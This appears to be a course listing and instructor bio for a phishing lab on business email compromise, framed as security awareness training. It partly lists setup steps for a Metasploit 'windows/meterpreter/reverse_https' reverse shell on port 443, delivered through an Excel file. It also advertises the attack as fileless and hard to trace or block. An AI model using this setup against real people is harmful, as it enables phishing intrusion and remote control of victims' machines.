This course will cover the basic to advanced phishing techniques on business email compromise. You will learn the attack from attacker 's view and know how to defence.
Security Awareness topic:
1. Lab on how to setup phishing attack
After this course, you will learn more on security awareness and know how to teach your staff preventing phishing.
Also, if you are learning ethical hacking, this lab will make you know how to setup phishing attack with below features:
a. Fileless attack and difficult to trace
b. 443 port attack and not easy to block
Students can reference the excel file and do the demo as same as the video. Any questions can ask here, I can provide sample excel as well if needed.
1. Download the VMs and run in the same machine.
VM for Windows: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
Choose Windows 10 and suitable for your VM solution.'
VM for Kali : https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/
2. Download the zip file
Excel file store in Window VM
Payload file store in Kali VM
3. Create rc script file in Kali VM
set payload windows/meterpreter/reverse_https
set LHOST <<Kali VM ip address>>
set LPORT 443
Hello Learners ,
I am Pareto . I am a web Security Researcher working in the field of Cyber Security focusing on pen testing, malware analysis and IOT hacking.
My strengths are:-
◆ Vulnerability Assessment ◆ Penetration Testing ◆ Wi-Fi Assessment ◆ Intrusion Detection ◆Risk's Identification ◆ Data Analysis ◆ Report and Briefing.
Best Security Tools I have used :-
Class-Dump-Z, Cycript, GNU Debugger, Fiddler, Nmap, Wikto, Brutus, WireShark, Burp Proxy, Paros Proxy, Cain and Abel, John the Ripper, Hydra, Metasploit, netcat, openssl, ike tools, Back track tools, Nessus, IBM-AppScan, Acunetix, Nikto, NetSparker, MicrosoftBaseline Security Analyzer (MBSA), Web Securify, Nipper.
Platforms - Windows, Linux operating System.